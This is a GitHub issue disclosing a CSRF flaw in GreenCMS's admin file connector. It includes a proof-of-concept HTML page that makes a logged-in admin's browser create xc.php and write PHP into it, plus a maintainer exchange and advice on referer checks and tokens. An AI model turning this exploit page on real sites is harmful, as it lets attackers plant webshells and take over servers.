Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

GreenCMS存在CSRF漏洞可获取webshell #108

Open
anquanquantao opened this issue Jun 1, 2018 · 2 comments
Open

GreenCMS存在CSRF漏洞可获取webshell #108

anquanquantao opened this issue Jun 1, 2018 · 2 comments
Labels

Comments

@anquanquantao
Copy link

anquanquantao commented Jun 1, 2018

漏洞发现者:惜潮
恶意攻击者可以精心伪造一个Html页面 从而获取网站webshell

利用代码
exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
<head> 
    <meta charset="UTF-8"> 
    <title>csrf测试</title> 
</head> 
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
	<!-- 下面的是生成文件名为xc.php的脚本文件 路径 127.0.0.1/Upload/xc.php -->
	<script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
	<input type="hidden" name="cmd" value="put">
	<input type="hidden" name="target" value="l1_eGMucGhw">
 	<input type="hidden" name="content" value="<?php phpinfo();?>">
	<!-- 下面的是提交表单 将content中的命令写入脚本内 -->
	<button type="submit" value="Submit">WebShell</button>
	</form>
	</body>
</html></span>
@TimothyZhang023
Copy link
Contributor

fileconnect 我记得是要登陆权限的,不分配权限给普通用户

@anquanquantao
Copy link
Author

csrf攻击一般是说管理员登陆后,访问到攻击者精心构造的csrf页面,浏览器会带上管理员的cookies进行请求,导致以管理员身份执行操作。防范方法一般可以判断页面请求来源,或增加随机的token。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

2 participants